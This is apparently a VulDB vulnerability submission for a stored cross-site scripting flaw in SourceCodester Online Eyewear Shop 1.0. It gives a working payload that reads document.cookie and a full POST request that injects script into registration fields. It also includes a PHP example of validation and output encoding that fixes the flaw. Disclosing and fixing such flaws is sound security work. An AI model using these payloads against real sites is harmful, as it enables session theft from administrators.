Submission #85725: SourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting Info

Title: SourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting

Description: The application Online Eyewear Shop 1.0 is vulnerable to stored Cross-Site Scripting attacks. The vulnerability is triggered by sending a specially crafted POST request as a customer user to the following URL:

- http://localhost/oews/classes/Users.php?f=registration

The vulnerable function is "registration" in the following source code file:

- oews/classes/Users.php

This function registers a new customer user or edits an already existing one. The application does not correctly sanitize the input provided by the user, and the XSS payload "><img src=X onerror=prompt(document.cookie)> can be uploaded in any of the following parameters:

- "firstname"
- "middlename"
- "lastname"
- "email"
- "contact"

Here is an example of the POST request:

'''
POST /oews/classes/Users.php?f=registration HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------110352294825610921354088773808
Content-Length: 1274
Connection: close
Cookie: PHPSESSID=lmpi80mm6i466es8arcrfj78vo

-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="id"

4
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="firstname"

XSS"><img src=X onerror=prompt(1)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="middlename"

"><img src=X onerror=prompt(2)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="lastname"

TEST"><img src=X onerror=prompt(3)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="gender"

Male
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="email"

[email protected]"><img src=X onerror=prompt(5)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="contact"

444"><img src=X onerror=prompt(6)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="password"


-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------110352294825610921354088773808--
'''

This set of information is stored in the database for the current user, and the script is executed any time the related fields are printed out on the website. For this reason, any administrator user could be a potential victim of this attack if she tries to edit that customer or simply by accessing the "Customer List View". This view (located at the URL "http://localhost/oews/admin/?page=customers") shows the values of the following fields:

- First Name
- Middle Name
- Last Name
- Email
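The two controls that close this class of bug, as an added example in PHP that is not code from Online Eyewear Shop or from the submitter: validate_registration() rejects the advisory's payload on the way in, and render_customer_row() encodes every field on the way out, so a record that was stored before the fix still renders as inert text in the customer list. The function names, the field rules, and the sample e-mail address (the page redacts the original) are assumptions for illustration.

```php
<?php
// Added example, not the Online Eyewear Shop code. Field rules and function
// names are assumptions; the sample values are constructed from the advisory.

// Input validation for the registration fields. Names allow letters in any
// script, combining marks, spaces, apostrophes, dots and hyphens; quotes and
// angle brackets never pass, so "><img ...> is rejected before it is stored.
function validate_registration(array $post): array
{
    $clean  = [];
    $errors = [];

    foreach (['firstname', 'middlename', 'lastname'] as $field) {
        $value = trim((string) ($post[$field] ?? ''));
        if ($value === '') {
            if ($field !== 'middlename') {   // middle name is optional
                $errors[$field] = 'required';
            }
            continue;
        }
        if (!preg_match('/^[\p{L}\p{M} \'.\-]{1,64}$/u', $value)) {
            $errors[$field] = 'invalid characters';
            continue;
        }
        $clean[$field] = $value;
    }

    $email = filter_var(trim((string) ($post['email'] ?? '')), FILTER_VALIDATE_EMAIL);
    if ($email === false) {
        $errors['email'] = 'invalid email address';
    } else {
        $clean['email'] = $email;
    }

    // Contact: optional leading +, then digits and spaces only.
    $contact = trim((string) ($post['contact'] ?? ''));
    if (!preg_match('/^\+?[0-9 ]{6,20}$/', $contact)) {
        $errors['contact'] = 'invalid contact number';
    } else {
        $clean['contact'] = $contact;
    }

    return [$clean, $errors];
}

// Output encoding for HTML text and double-quoted attribute contexts.
// ENT_QUOTES encodes both quote styles, so a value cannot close value="...".
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// One row of the admin "Customer List View" with every cell encoded,
// regardless of what validation let through in the past.
function render_customer_row(array $c): string
{
    $cells = '';
    foreach (['firstname', 'middlename', 'lastname', 'email'] as $field) {
        $cells .= '<td>' . h((string) ($c[$field] ?? '')) . '</td>';
    }
    return '<tr>' . $cells . '</tr>';
}

// Constructed sample input: the values from the advisory's POST request
// (the e-mail address is a placeholder; the page redacts the original).
$submitted = [
    'firstname'  => 'XSS"><img src=X onerror=prompt(1)>',
    'middlename' => '"><img src=X onerror=prompt(2)>',
    'lastname'   => 'TEST"><img src=X onerror=prompt(3)>',
    'email'      => 'test@example.com"><img src=X onerror=prompt(5)>',
    'contact'    => '444"><img src=X onerror=prompt(6)>',
];

[$clean, $errors] = validate_registration($submitted);
foreach ($errors as $field => $reason) {
    echo "$field: $reason\n";
}

// A record stored before the fix still renders safely: the <img> tag is
// emitted as entity-encoded text and is never parsed as markup.
echo render_customer_row($submitted), "\n";
```

With the sample above, validate_registration() reports all five fields as invalid, since each contains a double quote or an angle bracket, and render_customer_row() emits the payload as `&lt;img ...&gt;` inside the cell. Output encoding is the primary control here: rows already in the database carry the payload, and validation alone does nothing for them. h() is only correct for HTML text and quoted attribute values; a value placed inside a script block, an inline event handler or a URL needs the encoding for that context instead.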
User: CP_offensive_team (UID 40465)
Submitted: 2023-02-07 06:07 PM (3 years ago)
Moderation: 2023-02-07 08:59 PM (3 hours later)
Status: Accepted
VulDB Entry: 220369 [SourceCodester Online Eyewear Shop 1.0 POST Request oews/classes/Users.php registration firstname/middlename/lastname/email/contact Cross-Site Scripting]
Points: 17
